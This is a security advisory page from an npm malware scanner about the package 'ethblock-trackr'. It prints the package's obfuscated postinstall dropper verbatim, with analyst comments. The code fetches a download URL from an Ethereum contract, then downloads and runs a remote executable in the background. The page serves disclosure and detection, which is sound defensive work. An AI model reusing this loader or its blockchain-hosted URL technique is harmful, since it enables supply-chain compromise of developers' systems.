
Sandworm scans all new Npm package versions for malicious install scripts.
Scanning since October 2024.

ethblock-trackr

⚠️
Found 1 vulnerable version for package ethblock-trackr:

Detected: 31 Oct 2024
Detected Date: 31 Oct 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm

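The install script downloads a remote executable chosen by the user's operating system (`/node-win.exe`, `/node-linux` or `/node-macos`), saves it to the OS temporary directory, and executes it as a detached background process. It calls the `getString` method of an Ethereum mainnet contract and uses the returned string as the base URL of the download, so the download location is not hard-coded in the package and presumably can be changed without publishing a new version. Downloading and executing arbitrary code poses a significant security threat, as it can lead to unauthorized access or control over the system. Installing with lifecycle scripts disabled (`npm install --ignore-scripts`) keeps a `postinstall` hook like this one from running.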

Install script:
node x6n40ewn.cjs
Install script code:
/*
 * Analyst notes for defenders. The code below this comment is reproduced
 * unchanged from the listing; only this comment was added.
 *
 * Purpose
 *   postinstall dropper. It reads a string from an Ethereum mainnet contract,
 *   uses it as a base URL, downloads a platform-specific file into the OS
 *   temp directory, marks it executable on non-Windows hosts and starts it as
 *   a detached child process. runInstallation() is invoked unconditionally by
 *   the last statement of the file.
 *
 * Obfuscation layout
 *   - _0x5b35() returns the string table; _0x1e9d(i) returns table[i - 0x88].
 *   - The leading IIFE rotates the table with push(shift()) until a parseInt
 *     checksum over eleven entries equals 0x4f8aa. That happens after 32
 *     rotations, so lookup i resolves to printedTable[(i - 0x88 + 32) % 54].
 *   - Small objects with five-letter keys ('IfOKF', 'vXffe', 'yOkOW', ...)
 *     only wrap plain calls, comparisons and constants.
 *
 * Resolved values (all taken from the string table in this file)
 *   require(): 'ethers', 'axios', 'util', 'fs', 'path', 'os', 'child_process'
 *              ('util' is bound but never used below).
 *   contractAddress = '0xa1b40044EBc2794f207D45143Bd82a1B86156c6b'
 *   WalletOwner     = '0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84'
 *   abi             = one entry: getString(address account) view returns (string)
 *   provider        = ethers.getDefaultProvider('mainnet')
 *
 * Functions
 *   fetchAndUpdateIp()      awaits contract.getString(WalletOwner) and returns
 *                           the string. On any error it logs and calls itself
 *                           again, with no delay and no retry limit.
 *   getDownloadUrl(base)    appends '/node-win.exe' (win32), '/node-linux'
 *                           (linux) or '/node-macos' (darwin) to base; throws
 *                           'Unsupported platform: ...' for anything else.
 *   downloadFile(url, dest) axios GET with responseType 'stream', piped into
 *                           fs.createWriteStream(dest); the returned promise
 *                           settles on the stream's 'finish' / 'error'.
 *   executeFileInBackground(p)
 *                           spawn(p, [], { detached: true, stdio: 'ignore' })
 *                           followed by unref(), so the child is not tied to
 *                           the installer process.
 *   runInstallation()       dest = path.join(os.tmpdir(), path.basename(url));
 *                           download; chmodSync(dest, '755') unless the
 *                           platform is 'win32'; then execute. Errors are
 *                           logged and swallowed, so the install itself still
 *                           appears to succeed.
 *
 * Log strings are Russian: "Ошибка при получении IP адреса:" (error while
 * obtaining IP address), "Ошибка при запуске файла:" (error while launching
 * file), "Ошибка установки:" (installation error).
 *
 * Observable behaviour useful for detection: an npm lifecycle script that
 * queries an Ethereum mainnet provider, writes node-win.exe / node-linux /
 * node-macos into the temp directory, and leaves a detached child with stdio
 * ignored. No integrity or signature check is applied to the downloaded file.
 *
 * NOTE(review): the listing breaks the line directly after `return` inside the
 * 'IfOKF' wrapper. As printed, automatic semicolon insertion would end the
 * statement there; this is presumably a page-wrapping artifact — confirm
 * against the package tarball before relying on this listing.
 */
const _0x326e2e=_0x1e9d;(function(_0x715341,_0xbb49ac){const _0x48f59d=_0x1e9d,_0x3a217b=_0x715341();while(!![]){try{const _0xeb0c14=parseInt(_0x48f59d(0xb5))/0x1+parseInt(_0x48f59d(0xbc))/0x2*(parseInt(_0x48f59d(0xa0))/0x3)+parseInt(_0x48f59d(0xb1))/0x4*(parseInt(_0x48f59d(0xb8))/0x5)+parseInt(_0x48f59d(0x9f))/0x6+-parseInt(_0x48f59d(0x92))/0x7+parseInt(_0x48f59d(0xb2))/0x8*(-parseInt(_0x48f59d(0x8a))/0x9)+parseInt(_0x48f59d(0x93))/0xa*(parseInt(_0x48f59d(0x9c))/0xb);if(_0xeb0c14===_0xbb49ac)break;else _0x3a217b['push'](_0x3a217b['shift']());}catch(_0x585a1b){_0x3a217b['push'](_0x3a217b['shift']());}}}(_0x5b35,0x4f8aa));const {ethers}=require(_0x326e2e(0xa8)),axios=require(_0x326e2e(0x91)),util=require(_0x326e2e(0x95)),fs=require('fs'),path=require(_0x326e2e(0x9e)),os=require('os'),{spawn}=require(_0x326e2e(0x8b)),contractAddress=_0x326e2e(0xac),WalletOwner='0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84',abi=[_0x326e2e(0xb3)],provider=ethers[_0x326e2e(0x9a)]('mainnet'),contract=new ethers[(_0x326e2e(0x89))](contractAddress,abi,provider),fetchAndUpdateIp=async()=>{const _0x3a1fd3=_0x326e2e,_0x3c71a8={'ZREow':function(_0x54c650){return _0x54c650();}};try{const _0x3d0e05=await contract[_0x3a1fd3(0xa2)](WalletOwner);return _0x3d0e05;}catch(_0x1c5412){return console['error'](_0x3a1fd3(0x9d),_0x1c5412),await _0x3c71a8['ZREow'](fetchAndUpdateIp);}},getDownloadUrl=_0x41c931=>{const _0xb46ea1=_0x326e2e,_0x3b9187={'AlFXQ':_0xb46ea1(0xa9),'zxybJ':'linux','SJKwI':_0xb46ea1(0x96)},_0x2ae79b=os[_0xb46ea1(0xaf)]();switch(_0x2ae79b){case _0x3b9187[_0xb46ea1(0xbb)]:return _0x41c931+_0xb46ea1(0xab);case _0x3b9187[_0xb46ea1(0x8f)]:return _0x41c931+'/node-linux';case _0x3b9187[_0xb46ea1(0xa4)]:return _0x41c931+_0xb46ea1(0x88);default:throw new Error('Unsupported\x20platform:\x20'+_0x2ae79b);}},downloadFile=async(_0x3c7a99,_0x213a28)=>{const _0x3a8729=_0x326e2e,_0xe6423d={'zkkaT':_0x3a8729(0xa1),'IfOKF':function(_0x6603a8,_0x168827){return 
_0x6603a8(_0x168827);},'ronGl':_0x3a8729(0x8c),'iCrbd':_0x3a8729(0xa7)},_0x436b72=fs[_0x3a8729(0xae)](_0x213a28),_0x33b530=await _0xe6423d[_0x3a8729(0x8e)](axios,{'url':_0x3c7a99,'method':_0xe6423d[_0x3a8729(0xbd)],'responseType':_0xe6423d[_0x3a8729(0xa5)]});return _0x33b530[_0x3a8729(0xaa)][_0x3a8729(0xb6)](_0x436b72),new Promise((_0x512ef8,_0xc0241d)=>{_0x436b72['on']('finish',_0x512ef8),_0x436b72['on'](_0xe6423d['zkkaT'],_0xc0241d);});},executeFileInBackground=async _0x2cba57=>{const _0x48d761=_0x326e2e,_0x59fc63={'wpcjz':_0x48d761(0x9b),'xJSGa':_0x48d761(0xb9)};try{const _0x4b56de=spawn(_0x2cba57,[],{'detached':!![],'stdio':_0x59fc63[_0x48d761(0xb0)]});_0x4b56de['unref']();}catch(_0x33e65d){console[_0x48d761(0xa1)](_0x59fc63[_0x48d761(0xad)],_0x33e65d);}},runInstallation=async()=>{const _0x949794=_0x326e2e,_0x1bd0aa={'oDZKh':function(_0x426202){return _0x426202();},'vXffe':function(_0xfa75bd,_0x2220c9){return _0xfa75bd(_0x2220c9);},'yOkOW':function(_0x2b0c31,_0xd4c17a,_0x6821f2){return _0x2b0c31(_0xd4c17a,_0x6821f2);},'JIjUT':function(_0x3f8845,_0x24ecf6){return _0x3f8845!==_0x24ecf6;},'OBXgm':'win32','GcCLj':_0x949794(0xa3),'lbZbX':_0x949794(0xb4)};try{const _0xff3cef=await _0x1bd0aa[_0x949794(0xb7)](fetchAndUpdateIp),_0x2bfe45=_0x1bd0aa[_0x949794(0x90)](getDownloadUrl,_0xff3cef),_0x4e9517=os[_0x949794(0x8d)](),_0x330fcd=path[_0x949794(0xba)](_0x2bfe45),_0x9a81cb=path[_0x949794(0x94)](_0x4e9517,_0x330fcd);await _0x1bd0aa[_0x949794(0x99)](downloadFile,_0x2bfe45,_0x9a81cb);if(_0x1bd0aa[_0x949794(0xa6)](os[_0x949794(0xaf)](),_0x1bd0aa['OBXgm']))fs['chmodSync'](_0x9a81cb,_0x1bd0aa[_0x949794(0x98)]);_0x1bd0aa[_0x949794(0x90)](executeFileInBackground,_0x9a81cb);}catch(_0x1dd011){console[_0x949794(0xa1)](_0x1bd0aa[_0x949794(0x97)],_0x1dd011);}};function _0x1e9d(_0x1d2566,_0x1f3a7f){const _0x5b3582=_0x5b35();return _0x1e9d=function(_0x1e9d41,_0x4af0fe){_0x1e9d41=_0x1e9d41-0x88;let _0x447b77=_0x5b3582[_0x1e9d41];return _0x447b77;},_0x1e9d(_0x1d2566,_0x1f3a7f);}function 
_0x5b35(){const _0x38a239=['path','900246WCbHOG','942tgdQxi','error','getString','755','SJKwI','iCrbd','JIjUT','stream','ethers','win32','data','/node-win.exe','0xa1b40044EBc2794f207D45143Bd82a1B86156c6b','xJSGa','createWriteStream','platform','wpcjz','4PXZKyy','8qxrcDw','function\x20getString(address\x20account)\x20public\x20view\x20returns\x20(string)','Ошибка\x20установки:','180336VvYNdZ','pipe','oDZKh','1624355Camaho','Ошибка\x20при\x20запуске\x20файла:','basename','AlFXQ','808PSLBmL','ronGl','/node-macos','Contract','398601wXgLct','child_process','GET','tmpdir','IfOKF','zxybJ','vXffe','axios','4489730YlJAeb','4710qAEoQj','join','util','darwin','lbZbX','GcCLj','yOkOW','getDefaultProvider','ignore','5357fFQLOo','Ошибка\x20при\x20получении\x20IP\x20адреса:'];_0x5b35=function(){return _0x38a239;};return _0x5b35();}runInstallation();